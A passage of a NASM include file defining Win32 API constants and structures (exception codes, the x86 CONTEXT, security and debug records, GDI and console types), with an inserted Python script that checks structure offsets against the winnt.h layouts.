PSD_ENABLEPAGESETUPTEMPLATEHANDLE equ 20000h
PSD_ENABLEPAGEPAINTHOOK equ 40000h
PSD_DISABLEPAGEPAINTING equ 80000h
NM_FIRST equ 0-0
NM_LAST equ 0-99
DBG_CONTINUE equ 00010002h
DBG_TERMINATE_THREAD equ 40010003h
DBG_TERMINATE_PROCESS equ 40010004h
DBG_CONTROL_C equ 40010005h
DBG_CONTROL_BREAK equ 40010008h
DBG_EXCEPTION_NOT_HANDLED equ 80010001h
SIZE_OF_80387_REGISTERS equ 80
STATUS_WAIT_0 equ 00000000h
STATUS_ABANDONED_WAIT_0 equ 00000080h
STATUS_USER_APC equ 000000C0h
STATUS_TIMEOUT equ 00000102h
STATUS_PENDING equ 00000103h
STATUS_DATATYPE_MISALIGNMENT equ 80000002h
STATUS_BREAKPOINT equ 80000003h
STATUS_SINGLE_STEP equ 80000004h
STATUS_ACCESS_VIOLATION equ 0C0000005h
STATUS_IN_PAGE_ERROR equ 0C0000006h
STATUS_NO_MEMORY equ 0C0000017h
STATUS_ILLEGAL_INSTRUCTION equ 0C000001Dh
STATUS_NONCONTINUABLE_EXCEPTION equ 0C0000025h
STATUS_INVALID_DISPOSITION equ 0C0000026h
STATUS_ARRAY_BOUNDS_EXCEEDED equ 0C000008Ch
STATUS_FLOAT_DENORMAL_OPERAND equ 0C000008Dh
STATUS_FLOAT_DIVIDE_BY_ZERO equ 0C000008Eh
STATUS_FLOAT_INEXACT_RESULT equ 0C000008Fh
STATUS_FLOAT_INVALID_OPERATION equ 0C0000090h
STATUS_FLOAT_OVERFLOW equ 0C0000091h
STATUS_FLOAT_STACK_CHECK equ 0C0000092h
STATUS_FLOAT_UNDERFLOW equ 0C0000093h
STATUS_INTEGER_DIVIDE_BY_ZERO equ 0C0000094h
STATUS_INTEGER_OVERFLOW equ 0C0000095h
STATUS_PRIVILEGED_INSTRUCTION equ 0C0000096h
STATUS_STACK_OVERFLOW equ 0C00000FDh
STATUS_CONTROL_C_EXIT equ 0C000013Ah
EXCEPTION_CONTINUABLE equ 0
EXCEPTION_NONCONTINUABLE equ 1h
EXCEPTION_ACCESS_VIOLATION equ STATUS_ACCESS_VIOLATION
EXCEPTION_DATATYPE_MISALIGNMENT equ STATUS_DATATYPE_MISALIGNMENT
EXCEPTION_BREAKPOINT equ STATUS_BREAKPOINT
EXCEPTION_SINGLE_STEP equ STATUS_SINGLE_STEP
EXCEPTION_ARRAY_BOUNDS_EXCEEDED equ STATUS_ARRAY_BOUNDS_EXCEEDED
EXCEPTION_FLT_DENORMAL_OPERAND equ STATUS_FLOAT_DENORMAL_OPERAND
EXCEPTION_FLT_DIVIDE_BY_ZERO equ STATUS_FLOAT_DIVIDE_BY_ZERO
EXCEPTION_FLT_INEXACT_RESULT equ STATUS_FLOAT_INEXACT_RESULT
EXCEPTION_FLT_INVALID_OPERATION equ STATUS_FLOAT_INVALID_OPERATION
EXCEPTION_FLT_OVERFLOW equ STATUS_FLOAT_OVERFLOW
EXCEPTION_FLT_STACK_CHECK equ STATUS_FLOAT_STACK_CHECK
EXCEPTION_FLT_UNDERFLOW equ STATUS_FLOAT_UNDERFLOW
EXCEPTION_INT_DIVIDE_BY_ZERO equ STATUS_INTEGER_DIVIDE_BY_ZERO
EXCEPTION_INT_OVERFLOW equ STATUS_INTEGER_OVERFLOW
EXCEPTION_PRIV_INSTRUCTION equ STATUS_PRIVILEGED_INSTRUCTION
EXCEPTION_IN_PAGE_ERROR equ STATUS_IN_PAGE_ERROR
CONTEXT_i386 equ 00010000h
CONTEXT_i486 equ 00010000h
CONTEXT_CONTROL equ CONTEXT_i386|00000001h
CONTEXT_INTEGER equ CONTEXT_i386|00000002h
CONTEXT_SEGMENTS equ CONTEXT_i386|00000004h
CONTEXT_FLOATING_POINT equ CONTEXT_i386|00000008h
CONTEXT_DEBUG_REGISTERS equ CONTEXT_i386|00000010h
CONTEXT_FULL equ CONTEXT_CONTROL|CONTEXT_INTEGER|CONTEXT_SEGMENTS
IMAGE_DIRECTORY_ENTRY_EXPORT equ 0
IMAGE_DIRECTORY_ENTRY_IMPORT equ 1
IMAGE_DIRECTORY_ENTRY_RESOURCE equ 2
IMAGE_DIRECTORY_ENTRY_EXCEPTION equ 3
IMAGE_DIRECTORY_ENTRY_SECURITY equ 4
IMAGE_DIRECTORY_ENTRY_BASERELOC equ 5
IMAGE_DIRECTORY_ENTRY_DEBUG equ 6
IMAGE_DIRECTORY_ENTRY_COPYRIGHT equ 7
IMAGE_DIRECTORY_ENTRY_GLOBALPTR equ 8
IMAGE_DIRECTORY_ENTRY_TLS equ 9
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG equ 10
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT equ 11
IMAGE_DIRECTORY_ENTRY_IAT equ 12
IMAGE_NUMBEROF_DIRECTORY_ENTRIES equ 16
IMAGE_BITMAP equ 0
IMAGE_ICON equ 1
IMAGE_CURSOR equ 2
IMAGE_ENHMETAFILE equ 3
PROCESSOR_INTEL_386 equ 386
PROCESSOR_INTEL_486 equ 486
PROCESSOR_INTEL_PENTIUM equ 586
PROCESSOR_MIPS_R4000 equ 4000
PROCESSOR_ALPHA_21064 equ 21064
;-----------------------win32api structures-----------------------------
STRUC RECT
.left RESD 1
.top RESD 1
.right RESD 1
.bottom RESD 1
ENDSTRUC
STRUC POINT
.x RESD 1
.y RESD 1
ENDSTRUC
STRUC SIZEL
.x RESD 1
.y RESD 1
ENDSTRUC
STRUC MSG
.hwnd RESD 1
.message RESD 1
.wParam RESD 1
.lParam RESD 1
.time RESD 1
.pt RESB POINT_size
ENDSTRUC
STRUC SID_AND_ATTRIBUTES
.Sid RESD 1
.Attributes RESD 1
ENDSTRUC
STRUC SID_IDENTIFIER_AUTHORITY
.Value RESB 6 ; BYTE Value[6], big-endian authority
ENDSTRUC
STRUC OVERLAPPED
.Internal RESD 1
.InternalHigh RESD 1
.loffset RESD 1
.OffsetHigh RESD 1
.hEvent RESD 1
ENDSTRUC
STRUC SECURITY_ATTRIBUTES
.niLength RESD 1
.lpSecurityDescriptor RESD 1
.bInheritHandle RESD 1
ENDSTRUC
STRUC PROCESS_INFORMATION
.hProcess RESD 1
.hThread RESD 1
.dwProcessId RESD 1
.dwThreadId RESD 1
ENDSTRUC
STRUC FILETIME
.dwLowDateTime RESD 1
.dwHighDateTime RESD 1
ENDSTRUC
STRUC SYSTEMTIME
.wYear RESW 1
.wMonth RESW 1
.wDayOfWeek RESW 1
.wDay RESW 1
.wHour RESW 1
.wMinute RESW 1
.wSecond RESW 1
.wMilliseconds RESW 1
ENDSTRUC
STRUC COMMPROP
.wPacketiLength RESW 1
.wPacketVersion RESW 1
.dwServiceMask RESD 1
.dwReserved1 RESD 1
.dwMaxTxQueue RESD 1
.dwMaxRxQueue RESD 1
.dwMaxBaud RESD 1
.dwProvSubType RESD 1
.dwProvCapabilities RESD 1
.dwSettableParams RESD 1
.dwSettableBaud RESD 1
.wSettableData RESW 1
.wSettableStopParity RESW 1
.dwCurrentTxQueue RESD 1
.dwCurrentRxQueue RESD 1
.dwProvSpec1 RESD 1
.dwProvSpec2 RESD 1
.wcProvChar RESW 1
ENDSTRUC
STRUC COMSTAT
.fbits RESD 1 ; fCtsHold..fReserved are bit fields packed into one DWORD
.cbInQue RESD 1
.cbOutQue RESD 1
ENDSTRUC
STRUC DCB
.DCBlength RESD 1
.BaudRate RESD 1
.fbits RESD 1
.wReserved RESW 1
.XonLim RESW 1
.XoffLim RESW 1
.ByteSize RESB 1
.Parity RESB 1
.StopBits RESB 1
.XonChar RESB 1
.XoffChar RESB 1
.ErrorChar RESB 1
.EofChar RESB 1
.EvtChar RESB 1
ENDSTRUC
STRUC COMMTIMEOUTS
.ReadIntervalTimeout RESD 1
.ReadTotalTimeoutMultiplier RESD 1
.ReadTotalTimeoutConstant RESD 1
.WriteTotalTimeoutMultiplier RESD 1
.WriteTotalTimeoutConstant RESD 1
ENDSTRUC
STRUC SYSTEM_INFO
.dwOemID RESD 1
.dwPageSize RESD 1
.lpMinimumApplicationAddress RESD 1
.lpMaximumApplicationAddress RESD 1
.dwActiveProcessorMask RESD 1
.dwNumberOfProcessors RESD 1
.dwProcessorType RESD 1
.dwAllocationGranularity RESD 1
.wProcessorLevel RESW 1
.wProcessorRevision RESW 1
ENDSTRUC
STRUC MEMORYSTATUS
.dwiLength RESD 1
.dwMemoryLoad RESD 1
.dwTotalPhys RESD 1
.dwAvailPhys RESD 1
.dwTotalPageFile RESD 1
.dwAvailPageFile RESD 1
.dwTotalVirtual RESD 1
.dwAvailVirtual RESD 1
ENDSTRUC
STRUC TPMPARAMS
.cbSize RESD 1
.rcExclude RESB RECT_size
ENDSTRUC
STRUC GENERIC_MAPPING
.GenericRead RESD 1
.GenericWrite RESD 1
.GenericExecute RESD 1
.GenericAll RESD 1
ENDSTRUC
STRUC LUID
.LowPart RESD 1
.HighPart RESD 1
ENDSTRUC
STRUC LUID_AND_ATTRIBUTES
.pLuid RESB LUID_size ; embedded LUID (8 bytes), not a pointer
.Attributes RESD 1
ENDSTRUC
STRUC ACL
.AclRevision RESB 1
.Sbz1 RESB 1
.AclSize RESW 1
.AceCount RESW 1
.Sbz2 RESW 1
ENDSTRUC
STRUC ACE_HEADER
.AceType RESB 1
.AceFlags RESB 1
.AceSize RESW 1 ; WORD; the whole header is 4 bytes
ENDSTRUC
STRUC ACCESS_ALLOWED_ACE
.Header RESB ACE_HEADER_size
.imask RESD 1
.SidStart RESD 1 ; first DWORD of the variable-length SID
ENDSTRUC
STRUC ACCESS_DENIED_ACE
.Header RESB ACE_HEADER_size
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC SYSTEM_AUDIT_ACE
.Header RESB ACE_HEADER_size
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC SYSTEM_ALARM_ACE
.Header RESB ACE_HEADER_size
.imask RESD 1
.SidStart RESD 1
ENDSTRUC
STRUC ACL_REVISION_INFORMATION
.AclRevision RESD 1
ENDSTRUC
STRUC ACL_SIZE_INFORMATION
.AceCount RESD 1
.AclBytesInUse RESD 1
.AclBytesFree RESD 1
ENDSTRUC
STRUC SECURITY_DESCRIPTOR
.Revision RESB 1
.Sbz1 RESB 1
.Control RESW 1 ; SECURITY_DESCRIPTOR_CONTROL is a WORD
.Owner RESD 1
.lGroup RESD 1
.Sacl RESD 1
.Dacl RESD 1
ENDSTRUC
STRUC PRIVILEGE_SET
.PrivilegeCount RESD 1
.Control RESD 1
.Privilege RESB LUID_AND_ATTRIBUTES_size ; Privilege[ANYSIZE_ARRAY]
ENDSTRUC
STRUC EXCEPTION_RECORD
.ExceptionCode RESD 1
.ExceptionFlags RESD 1
.pExceptionRecord RESD 1 ; nested record, NULL if none
.ExceptionAddress RESD 1
.NumberParameters RESD 1
.ExceptionInformation RESD 15 ; EXCEPTION_MAXIMUM_PARAMETERS
ENDSTRUC
STRUC EXCEPTION_DEBUG_INFO
.pExceptionRecord RESD 1
.dwFirstChance RESD 1
ENDSTRUC
STRUC CREATE_THREAD_DEBUG_INFO
.hThread RESD 1
.lpThreadLocalBase RESD 1
.lpStartAddress RESD 1
ENDSTRUC
STRUC CREATE_PROCESS_DEBUG_INFO
.hFile RESD 1
.hProcess RESD 1
.hThread RESD 1
.lpBaseOfImage RESD 1
.dwDebugInfoFileOffset RESD 1
.nDebugInfoSize RESD 1
.lpThreadLocalBase RESD 1
.lpStartAddress RESD 1
.lpImageName RESD 1
.fUnicode RESD 1
ENDSTRUC
STRUC EXIT_THREAD_DEBUG_INFO
.dwExitCode RESD 1
ENDSTRUC
STRUC EXIT_PROCESS_DEBUG_INFO
.dwExitCode RESD 1
ENDSTRUC
STRUC LOAD_DLL_DEBUG_INFO
.hFile RESD 1
.lpBaseOfDll RESD 1
.dwDebugInfoFileOffset RESD 1
.nDebugInfoSize RESD 1
.lpImageName RESD 1
.fUnicode RESW 1
ENDSTRUC
STRUC UNLOAD_DLL_DEBUG_INFO
.lpBaseOfDll RESD 1
ENDSTRUC
STRUC OUTPUT_DEBUG_STRING_INFO
.lpDebugStringData RESD 1
.fUnicode RESW 1
.nDebugStringiLength RESW 1
ENDSTRUC
STRUC RIP_INFO
.dwError RESD 1
.dwType RESD 1
ENDSTRUC
STRUC OFSTRUCT
.cBytes RESB 1
.fFixedDisk RESB 1
.nErrCode RESW 1
.Reserved1 RESW 1
.Reserved2 RESW 1
.szPathName RESB 128 ; OFS_MAXPATHNAME
ENDSTRUC
STRUC WNDCLASSEX
.cbSize RESD 1
.style RESD 1
.lpfnWndProc RESD 1
.cbClsExtra RESD 1
.cbWndExtra RESD 1
.hInstance RESD 1
.hIcon RESD 1
.hCursor RESD 1
.hbrBackground RESD 1
.lpszMenuName RESD 1
.lpszClassName RESD 1
.hIconSm RESD 1
ENDSTRUC
STRUC WNDCLASS
.style RESD 1
.lpfnWndProc RESD 1
.cbClsExtra RESD 1
.cbWndExtra RESD 1
.hInstance RESD 1
.hIcon RESD 1
.hCursor RESD 1
.hbrBackground RESD 1
.lpszMenuName RESD 1
.lpszClassName RESD 1
ENDSTRUC
STRUC CRITICAL_SECTION
.Par1 RESD 1
.Par2 RESD 1
.Par3 RESD 1
.Par4 RESD 1
.Par5 RESD 1
.Par6 RESD 1
ENDSTRUC
STRUC BY_HANDLE_FILE_INFORMATION
.dwFileAttributes RESD 1
.ftCreationTime RESB FILETIME_size
.ftLastAccessTime RESB FILETIME_size
.ftLastWriteTime RESB FILETIME_size
.dwVolumeSerialNumber RESD 1
.nFileSizeHigh RESD 1
.nFileSizeLow RESD 1
.nNumberOfLinks RESD 1
.nFileIndexHigh RESD 1
.nFileIndexLow RESD 1
ENDSTRUC
STRUC MEMORY_BASIC_INFORMATION
.BaseAddress RESD 1
.AllocationBase RESD 1
.AllocationProtect RESD 1
.RegionSize RESD 1
.State RESD 1
.Protect RESD 1
.lType RESD 1
ENDSTRUC
STRUC EVENTLOGRECORD
.iLength RESD 1
.Reserved RESD 1
.RecordNumber RESD 1
.TimeGenerated RESD 1
.TimeWritten RESD 1
.EventID RESD 1
.EventType RESW 1
.NumStrings RESW 1
.EventCategory RESW 1
.ReservedFlags RESW 1
.ClosingRecordNumber RESD 1
.StringOffset RESD 1
.UserSidiLength RESD 1
.UserSidOffset RESD 1
.DataiLength RESD 1
.DataOffset RESD 1
ENDSTRUC
STRUC TOKEN_GROUPS
.GroupCount RESD 1
.Groups RESB SID_AND_ATTRIBUTES_size ; Groups[ANYSIZE_ARRAY]
ENDSTRUC
STRUC TOKEN_PRIVILEGES
.PrivilegeCount RESD 1
.Privileges RESB LUID_size+4 ; one LUID_AND_ATTRIBUTES: LUID plus DWORD Attributes
ENDSTRUC
STRUC FLOATING_SAVE_AREA
.ControlWord RESD 1
.StatusWord RESD 1
.TagWord RESD 1
.ErrorOffset RESD 1
.ErrorSelector RESD 1
.DataOffset RESD 1
.DataSelector RESD 1
.RegisterArea RESB SIZE_OF_80387_REGISTERS ; 80 bytes
.Cr0NpxState RESD 1
ENDSTRUC ; 112 bytes (70h)
STRUC CONTEXT ; x86 CONTEXT, offsets as in winnt.h
.ContextFlags RESD 1 ; 00h
.iDr0 RESD 1 ; 04h
.iDr1 RESD 1 ; 08h
.iDr2 RESD 1 ; 0Ch
.iDr3 RESD 1 ; 10h
.iDr6 RESD 1 ; 14h
.iDr7 RESD 1 ; 18h
.FloatSave RESB FLOATING_SAVE_AREA_size ; 1Ch, whole FLOATING_SAVE_AREA embedded, not a dword
.regGs RESD 1 ; 8Ch
.regFs RESD 1 ; 90h
.regEs RESD 1 ; 94h
.regDs RESD 1 ; 98h
.regEdi RESD 1 ; 9Ch
.regEsi RESD 1 ; 0A0h
.regEbx RESD 1 ; 0A4h
.regEdx RESD 1 ; 0A8h
.regEcx RESD 1 ; 0ACh
.regEax RESD 1 ; 0B0h
.regEbp RESD 1 ; 0B4h
.regEip RESD 1 ; 0B8h
.regCs RESD 1 ; 0BCh
.regFlag RESD 1 ; 0C0h (EFlags)
.regEsp RESD 1 ; 0C4h
.regSs RESD 1 ; 0C8h
.ExtendedRegisters RESB 512 ; 0CCh, MAXIMUM_SUPPORTED_EXTENSION (CONTEXT_EXTENDED_REGISTERS)
ENDSTRUC ; 716 bytes (2CCh)
STRUC EXCEPTION_POINTERS
.pExceptionRecord RESD 1
.ContextRecord RESD 1
ENDSTRUC
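; Added example (Python, not part of this include or of any 29A source):
; an offset calculator for the STRUC/RESx syntax used in this file. It
; evaluates equ constants and the <name>_size symbols NASM defines, then
; checks FLOATING_SAVE_AREA, CONTEXT, LUID_AND_ATTRIBUTES and
; TOKEN_PRIVILEGES against the x86 offsets in winnt.h. Both inputs are
; constructed inline: the corrected definitions, and the same text with
; FloatSave declared as a single dword, which moves regEip from 0B8h to
; 4Ch and would make an SEH handler patch the wrong field of the CONTEXT.

```python
"""NASM STRUC offset calculator (added example, not part of the 29A include).

Parses STRUC/RESx text, resolves equ constants and <name>_size symbols, and
compares the result with the x86 layouts documented in winnt.h.
"""
import ast
import re

RES_BYTES = {"RESB": 1, "RESW": 2, "RESD": 4, "RESQ": 8}

# Constructed input in the include's syntax: the corrected definitions.
FIXED = "\n".join(
    ["SIZE_OF_80387_REGISTERS equ 80",
     "STRUC LUID", ".LowPart RESD 1", ".HighPart RESD 1", "ENDSTRUC",
     "STRUC LUID_AND_ATTRIBUTES", ".pLuid RESB LUID_size",
     ".Attributes RESD 1", "ENDSTRUC",
     "STRUC TOKEN_PRIVILEGES", ".PrivilegeCount RESD 1",
     ".Privileges RESB LUID_AND_ATTRIBUTES_size", "ENDSTRUC",
     "STRUC FLOATING_SAVE_AREA"]
    + [f".{f} RESD 1" for f in ("ControlWord StatusWord TagWord ErrorOffset "
                                "ErrorSelector DataOffset DataSelector").split()]
    + [".RegisterArea RESB SIZE_OF_80387_REGISTERS", ".Cr0NpxState RESD 1",
       "ENDSTRUC", "STRUC CONTEXT", ".ContextFlags RESD 1"]
    + [f".iDr{n} RESD 1" for n in (0, 1, 2, 3, 6, 7)]
    + [".FloatSave RESB FLOATING_SAVE_AREA_size"]
    + [f".reg{r} RESD 1" for r in
       "Gs Fs Es Ds Edi Esi Ebx Edx Ecx Eax Ebp Eip Cs Flag Esp Ss".split()]
    + [".ExtendedRegisters RESB 512", "ENDSTRUC"])

# Constructed input: the same text with FloatSave as one dword, the bug that
# shifts every register field and puts regEip at 4Ch instead of 0B8h.
BROKEN = FIXED.replace(".FloatSave RESB FLOATING_SAVE_AREA_size",
                       ".FloatSave RESD 1")

def _eval(expr, consts):
    """Evaluate a NASM constant expression (+ - *, names, 0ABh hex) without eval()."""
    expr = re.sub(r"\b(\d[0-9A-Fa-f]*)h\b",
                  lambda m: str(int(m.group(1), 16)), expr)

    def walk(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        if isinstance(n, ast.Name):
            if n.id not in consts:  # RESx needs a backward reference in NASM
                raise KeyError(f"{n.id}: undefined or forward reference")
            return consts[n.id]
        if isinstance(n, ast.BinOp) and type(n.op) in (ast.Add, ast.Sub, ast.Mult):
            l, r = walk(n.left), walk(n.right)
            return {ast.Add: l + r, ast.Sub: l - r, ast.Mult: l * r}[type(n.op)]
        if isinstance(n, ast.UnaryOp) and isinstance(n.op, ast.USub):
            return -walk(n.operand)
        raise ValueError(f"unsupported expression: {expr}")

    return walk(ast.parse(expr.strip(), mode="eval").body)

def parse_strucs(text):
    """Return {struct: {"size": bytes, "fields": {name: (offset, bytes)}}}."""
    consts, strucs, cur = {}, {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if m := re.fullmatch(r"STRUC\s+(\w+)", line, re.I):
            cur = m.group(1)
            strucs[cur] = {"size": 0, "fields": {}}
        elif re.fullmatch(r"ENDSTRUC", line, re.I):
            consts[cur + "_size"] = strucs[cur]["size"]  # as NASM does
            cur = None
        elif m := re.fullmatch(r"(\w+)\s+equ\s+(.+)", line, re.I):
            consts[m.group(1)] = _eval(m.group(2), consts)
        elif m := re.fullmatch(r"\.(\w+)\s+(RES[BWDQ])\s+(.+)", line, re.I):
            width = RES_BYTES[m.group(2).upper()] * _eval(m.group(3), consts)
            strucs[cur]["fields"][m.group(1)] = (strucs[cur]["size"], width)
            strucs[cur]["size"] += width
        else:
            raise ValueError(f"unparsed line: {raw!r}")
    return strucs

# Reference x86 sizes and offsets from winnt.h; CONTEXT includes the 512-byte
# ExtendedRegisters area, so sizeof(CONTEXT) == 716.
EXPECTED = {
    "FLOATING_SAVE_AREA": (112, {"RegisterArea": 0x1C}),
    "CONTEXT": (716, {"FloatSave": 0x1C, "regGs": 0x8C, "regEax": 0xB0,
                      "regEip": 0xB8, "regEsp": 0xC4}),
    "LUID_AND_ATTRIBUTES": (12, {"Attributes": 8}),
    "TOKEN_PRIVILEGES": (16, {"Privileges": 4}),
}

def check_layout(strucs):
    """Return a list of mismatches against EXPECTED; empty means it agrees."""
    problems = []
    for name, (size, offsets) in EXPECTED.items():
        s = strucs.get(name)
        if s is None:
            problems.append(f"{name}: not defined")
            continue
        if s["size"] != size:
            problems.append(f"{name}: size {s['size']}, expected {size}")
        for field, want in offsets.items():
            got = s["fields"].get(field, (None,))[0]
            if got != want:
                problems.append(f"{name}.{field}: offset {got}, expected {want}")
    return problems

if __name__ == "__main__":
    print("fixed :", check_layout(parse_strucs(FIXED)) or "matches winnt.h")
    print("broken:", check_layout(parse_strucs(BROKEN)))
```

; Feed parse_strucs() the whole include to get every field offset; the
; KeyError on an unknown name mirrors NASM's refusal of forward references
; in RESx counts, which is why a struct must be defined before its _size
; is used.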
STRUC LDT_BYTES
.BaseMid RESB 1
.Flags1 RESB 1
.Flags2 RESB 1
.BaseHi RESB 1
ENDSTRUC
STRUC LDT_ENTRY
.LimitLow RESW 1
.BaseLow RESW 1
.HiWord RESD 1
ENDSTRUC
STRUC TIME_ZONE_INFORMATION
.Bias RESD 1
.StandardName RESW 32 ; WCHAR[32]
.StandardDate RESB SYSTEMTIME_size
.StandardBias RESD 1
.DaylightName RESW 32 ; WCHAR[32]
.DaylightDate RESB SYSTEMTIME_size
.DaylightBias RESD 1
ENDSTRUC
STRUC WIN32_STREAM_ID
.dwStreamID RESD 1
.dwStreamAttributes RESD 1
.dwStreamSizeLow RESD 1
.dwStreamSizeHigh RESD 1
.dwStreamNameSize RESD 1
.cStreamName RESB 1
ENDSTRUC
STRUC STARTUPINFO
.cb RESD 1
.lpReserved RESD 1
.lpDesktop RESD 1
.lpTitle RESD 1
.dwX RESD 1
.dwY RESD 1
.dwXSize RESD 1
.dwYSize RESD 1
.dwXCountChars RESD 1
.dwYCountChars RESD 1
.dwFillAttribute RESD 1
.dwFlags RESD 1
.wShowWindow RESW 1
.cbReserved2 RESW 1
.lpReserved2 RESD 1 ; LPBYTE pointer, not a byte
.hStdInput RESD 1
.hStdOutput RESD 1
.hStdError RESD 1
ENDSTRUC
STRUC WIN32_FIND_DATA
.dwFileAttributes RESD 1
.ftCreationTime RESB FILETIME_size
.ftLastAccessTime RESB FILETIME_size
.ftLastWriteTime RESB FILETIME_size
.nFileSizeHigh RESD 1
.nFileSizeLow RESD 1
.dwReserved0 RESD 1
.dwReserved1 RESD 1
.cFileName RESB MAX_PATH
.cAlternate RESB 14
ENDSTRUC
STRUC CPINFO
.MaxCharSize RESD 1
.DefaultChar RESB 2 ; MAX_DEFAULTCHAR
.LeadByte RESB 12 ; MAX_LEADBYTES
ENDSTRUC
STRUC NUMBERFMT
.NumDigits RESD 1
.LeadingZero RESD 1
.Grouping RESD 1
.lpDecimalSep RESD 1
.lpThousandSep RESD 1
.NegativeOrder RESD 1
ENDSTRUC
STRUC CURRENCYFMT
.NumDigits RESD 1
.LeadingZero RESD 1
.Grouping RESD 1
.lpDecimalSep RESD 1
.lpThousandSep RESD 1
.NegativeOrder RESD 1
.PositiveOrder RESD 1
.lpCurrencySymbol RESD 1
ENDSTRUC
STRUC COORD
.x RESW 1
.y RESW 1
ENDSTRUC
STRUC SMALL_RECT
.left RESW 1
.top RESW 1
.right RESW 1
.bottom RESW 1
ENDSTRUC
STRUC KEY_EVENT_RECORD
.bKeyDown RESD 1
.wRepeatCount RESW 1
.wVirtualKeyCode RESW 1
.wVirtualScanCode RESW 1
.uChar RESW 1
.dwControlKeyState RESD 1
ENDSTRUC
STRUC MOUSE_EVENT_RECORD
.dwMousePosition RESD 1
.dwButtonState RESD 1
.dwControlKeyState RESD 1
.dwEventFlags RESD 1
ENDSTRUC
STRUC WINDOW_BUFFER_SIZE_RECORD
.dwSize RESD 1
ENDSTRUC
STRUC MENU_EVENT_RECORD
.dwCommandId RESD 1
ENDSTRUC
STRUC FOCUS_EVENT_RECORD
.bSetFocus RESD 1
ENDSTRUC
STRUC CHAR_INFO
.Char RESW 1
.Attributes RESW 1
ENDSTRUC
STRUC CONSOLE_SCREEN_BUFFER_INFO
.dwSize RESD 1
.dwCursorPosition RESD 1
.wAttributes RESW 1
.srWindow RESB SMALL_RECT_size
.dwMaximumWindowSize RESD 1
ENDSTRUC
STRUC CONSOLE_CURSOR_INFO
.dwSize RESD 1
.bVisible RESD 1
ENDSTRUC
STRUC XFORM ; six 4-byte FLOATs
.eM11 RESD 1
.eM12 RESD 1
.eM21 RESD 1
.eM22 RESD 1
.ex RESD 1
.ey RESD 1
ENDSTRUC
STRUC BITMAP
.bmType RESD 1
.bmWidth RESD 1
.bmHeight RESD 1
.bmWidthBytes RESD 1
.bmPlanes RESW 1
.bmBitsPixel RESW 1
.bmBits RESD 1
ENDSTRUC
STRUC RGBTRIPLE
.rgbtBlue RESB 1
.rgbtGreen RESB 1
.rgbtRed RESB 1
ENDSTRUC
STRUC RGBQUAD
.rgbBlue RESB 1
.rgbGreen RESB 1
.rgbRed RESB 1
.rgbReserved RESB 1
ENDSTRUC
STRUC BITMAPCOREHEADER
.bcSize RESD 1
.bcWidth RESW 1
.bcHeight RESW 1
.bcPlanes RESW 1
.bcBitCount RESW 1
ENDSTRUC
STRUC BITMAPINFOHEADER
.biSize RESD 1
.biWidth RESD 1
.biHeight RESD 1
.biPlanes RESW 1
.biBitCount RESW 1
.biCompression RESD 1
.biSizeImage RESD 1
.biXPelsPerMeter RESD 1
.biYPelsPerMeter RESD 1
.biClrUsed RESD 1
.biClrImportant RESD 1
ENDSTRUC
STRUC BITMAPINFO
.bmiHeader RESB BITMAPINFOHEADER_size
.bmiColors RESB RGBQUAD_size ; bmiColors[1]
ENDSTRUC
STRUC BITMAPCOREINFO
.bmciHeader RESB BITMAPCOREHEADER_size
.bmciColors RESB RGBTRIPLE_size ; bmciColors[1]
ENDSTRUC
STRUC BITMAPFILEHEADER
.bfType RESW 1
.bfSize RESD 1
.bfReserved1 RESW 1
.bfReserved2 RESW 1
.bfOffBits RESD 1
ENDSTRUC
STRUC HANDLETABLE
.objectHandle RESD 1
ENDSTRUC
STRUC METARECORD
.rdSize RESD 1
.rdFunction RESW 1
.rdParm1 RESW 1
ENDSTRUC
STRUC METAFILEPICT
.imm RESD 1
.xExt RESD 1
.yExt RESD 1
.hMF RESD 1
ENDSTRUC
STRUC METAHEADER
.mtType RESW 1
.mtHeaderSize RESW 1
.mtVersion RESW 1
.mtSize RESD 1
.mtNoObjects RESW 1
.mtMaxRecord RESD 1
.mtNoParameters RESW 1
ENDSTRUC
STRUC ENHMETARECORD
.iType RESD 1
.nSize RESD 1
.dParm1 RESD 1
ENDSTRUC
STRUC ENHMETAHEADER
.iType RESD 1
.nSize RESD 1
.rclBounds RESB RECT_size
.rclFrame RESB RECT_size
.dSignature RESD 1
.nVersion RESD 1
.nBytes RESD 1
.nRecords RESD 1
.nHandles RESW 1
.sReserved RESW 1
.nDescription RESD 1
.offDescription RESD 1
.nPalEntries RESD 1
.szlDevice RESB SIZEL_size
.szlMillimeters RESB SIZEL_size
ENDSTRUC
STRUC TEXTMETRIC
.tmHeight RESD 1
.tmAscent RESD 1
.tmDescent RESD 1
.tmInternalLeading RESD 1
.tmExternalLeading RESD 1
.tmAveCharWidth RESD 1
.tmMaxCharWidth RESD 1
.tmWeight RESD 1
.tmOverhang RESD 1
.tmDigitizedAspectX RESD 1
.tmDigitizedAspectY RESD 1
.tmFirstChar RESB 1
.tmLastChar RESB 1
.tmDefaultChar RESB 1
.tmBreakChar RESB 1
.tmItalic RESB 1
.tmUnderlined RESB 1
.tmStruckOut RESB 1
.tmPitchAndFamily RESB 1
.tmCharSet RESB 1
ENDSTRUC
STRUC NEWTEXTMETRIC
.tmHeight RESD 1
.tmAscent RESD 1
.tmDescent RESD 1
.tmInternalLeading RESD 1
.tmExternalLeading RESD 1
.tmAveCharWidth RESD 1
.tmMaxCharWidth RESD 1
.tmWeight RESD 1
.tmOverhang RESD 1
.tmDigitizedAspectX RESD 1
.tmDigitizedAspectY RESD 1
.tmFirstChar RESB 1
.tmLastChar RESB 1
.tmDefaultChar RESB 1
.tmBreakChar RESB 1
.tmItalic RESB 1
.tmUnderlined RESB 1
.tmStruckOut RESB 1
.tmPitchAndFamily RESB 1
.tmCharSet RESB 1
.ntmFlags RESD 1
.ntmSizeEM RESD 1
.ntmCellHeight RESD 1
.ntmAveWidth RESD 1
ENDSTRUC
STRUC PELARRAY
.paXCount RESD 1
.paYCount RESD 1
.paXExt RESD 1
.paYExt RESD 1
.paRGBs RESW 1
ENDSTRUC
STRUC LOGBRUSH
.lbStyle RESD 1
.lbColor RESD 1
.lbHatch RESD 1
ENDSTRUC
STRUC LOGPEN
.lopnStyle RESD 1
.lopnWidth RESB POINT_size
.lopnColor RESD 1
ENDSTRUC
STRUC EXTLOGPEN
.elpPenStyle RESD 1
.elpWidth RESD 1
